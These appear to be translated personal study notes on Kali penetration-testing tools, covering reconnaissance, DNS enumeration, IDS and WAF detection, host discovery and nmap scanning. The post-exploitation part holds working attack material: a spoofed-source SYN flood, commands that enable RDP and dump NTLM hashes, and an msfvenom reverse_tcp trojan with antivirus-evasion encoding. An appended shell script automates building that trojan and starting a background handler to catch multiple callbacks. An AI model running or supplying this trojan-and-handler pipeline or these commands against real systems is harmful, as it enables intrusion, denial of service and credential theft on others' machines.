bettercap: ARP spoofing (man-in-the-middle on the local network)
DNS reconnaissance
dnsmap: brute-force subdomain guessing
dmitry -wiens -o search.txt baidu.com: all-in-one tool that collects whois (-w), IP whois (-i), e-mail addresses (-e), Netcraft data (-n) and subdomains (-s), writing the results to search.txt
recon-ng: brute-force DNS subdomains; this works best combined with the Shodan API (needs an API key)
IPS/IDS identification (intrusion detection and prevention systems)
fragroute www.baidu.com: intercepts and fragments the outbound traffic to that host; then open the site in a browser and the rewritten packets are logged by fragroute (used to test whether an IDS reassembles fragments correctly)
lbd baidu.com: detects whether a site sits behind load balancing, by comparing DNS answers and HTTP headers across requests; it is old and often reports nothing against modern CDN setups
wafw00f www.baidu.com: WAF detection; did not seem very reliable in testing
Host discovery
atk6-alive6 eth0 (interface name): finds live IPv6 hosts, but only on the same link, because it relies on link-local multicast
msf has the same function:
use auxiliary/scanner/discovery/ipv6_multicast_ping
show options
set the options it lists (interface and source address; it pings the all-nodes multicast address, so there is no separate target list to set)
run
Teacher-recommended useful tool: hping3
hping3 --icmp -c 2 192.168.1.7: routine liveness check (two ICMP echo requests)
hping3 -S --flood --rand-source -p 80 192.168.1.7: SYN flood with spoofed random source addresses; this is a DoS, not a scan, and belongs only in a lab
hping3 -1 <ip>: -1 is the short form of --icmp
nmap 192.168.1.0/24: liveness sweep of the local subnet (add -sn for host discovery only, otherwise every live host is also port-scanned)
Port, server and service scanning (nmap)
Fingerprinting
OS identification
nmap -O 192.168.0.1: OS detection (-A adds version detection and default scripts)
xprobe2 www.freebuf.com -p tcp:80:open: OS fingerprinting, telling xprobe2 that tcp/80 is known to be open so it can use that port for its probes
whatweb www.freebuf.com: web server and web application fingerprinting
masscan: built for scale and speed; it randomizes the target order, which spreads the load across hosts
masscan 192.168.1.0/24 -p 80 --banners
(masscan uses its own TCP/IP stack, so for --banners either give it a separate --source-ip, or use --source-port 61000 and add an iptables rule dropping inbound tcp to port 61000, so the kernel does not RST the connections masscan opens)
Integrated tool: Sparta, a GUI that chains nmap and other tools; add an IP or IP range and it does the rest, very good
Vulnerability scanning framework: OpenVAS
Web application attack and audit framework: w3af
w3af: installation is not very friendly and it runs sluggishly; not much used for now
msf workflow
Important post-exploitation commands:
Enable RDP (port 3389) through the registry: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(the Windows firewall may still block 3389; netsh advfirewall firewall set rule group="remote desktop" new enable=Yes opens it)
Dump password hashes: search hashdump, use the post/windows/gather/hashdump module, show options, set SESSION <id>, run; this gives NTLM hashes, not plaintext passwords, so they still have to be cracked or passed
Remote desktop connection: rdesktop 192.168.0.1:3389
Trojan generation:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=<own ip> LPORT=4444 -f exe > /root/xiee.exe
Put it on the target host first and check whether it calls back (shikata_ga_nai encoding does not reliably get past current antivirus)
Then start the listener on the attack machine: msf5 > use exploit/multi/handler
Set the payload: set payload windows/meterpreter/reverse_tcp (must be the same payload used to generate the trojan)
Set your own listening address and port: set lhost <own ip> and set lport 4444 (LPORT is the port, not an IP; both must match the LHOST/LPORT given to msfvenom)
Start it: run (or exploit -j to keep the handler running in the background)
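The msfvenom-plus-handler procedure above as one script. This is an added example, not part of the original notes: the msfvenom command and the multi/handler resource script are derived from the same PAYLOAD/LHOST/LPORT variables, and the values are validated first, so the handler cannot end up with an IP address in LPORT or a mismatched port. The attacker IP 192.168.188.10 and the output path are placeholders (assumptions); msfvenom and msfconsole are only invoked when the script is run with the argument `run`, so the checks can be exercised on a box without Metasploit.

```shell
#!/bin/sh
# Added example, not from the original notes. Builds the reverse_tcp trojan and
# a matching multi/handler resource script from ONE set of variables, and checks
# the values first (LPORT must be a port, LHOST an IPv4 address).
set -eu

PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
LHOST="${LHOST:-192.168.188.10}"   # assumption: replace with the attacker's own IP
LPORT="${LPORT:-4444}"             # the port the trojan connects back to
OUT="${OUT:-/root/xiee.exe}"       # output path used in the notes

# Accept only four dotted decimal octets in 0-255.
valid_ipv4() {
  ip="$1"
  case "$ip" in
    ""|*[!0-9.]*) return 1 ;;
  esac
  old_ifs="$IFS"; IFS=.
  set -- $ip
  IFS="$old_ifs"
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    [ -n "$o" ] && [ "$o" -le 255 ] || return 1
  done
  return 0
}

# Accept only an integer in 1-65535 (rejects the "set lport <ip>" mistake).
valid_port() {
  case "$1" in
    ""|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print an msfconsole resource script whose PAYLOAD/LHOST/LPORT are exactly
# the values handed to msfvenom; fails loudly on a bad host or port.
handler_rc() {
  payload="$1"; lhost="$2"; lport="$3"
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport (a port, not an IP)" >&2; return 1; }
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# msfvenom with the same encoder and iteration count as the notes.
build_payload() {
  msfvenom -p "$PAYLOAD" -e x86/shikata_ga_nai -i 5 \
    LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$OUT"
}

# Run the whole pipeline only when asked (./handler.sh run), so the functions
# can be sourced and checked on a machine without Metasploit installed.
if [ "${1:-}" = "run" ]; then
  handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > /tmp/handler.rc
  build_payload
  msfconsole -q -r /tmp/handler.rc
fi
```

Usage: `LHOST=<own ip> ./handler.sh run` writes the trojan, then starts msfconsole with the handler already listening as a background job (exploit -j -z) so several callbacks can be caught without re-running the setup. Setting ExitOnSession false keeps the handler up after the first session arrives.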
Armitage
The GUI front end for msf; laggy and sometimes slow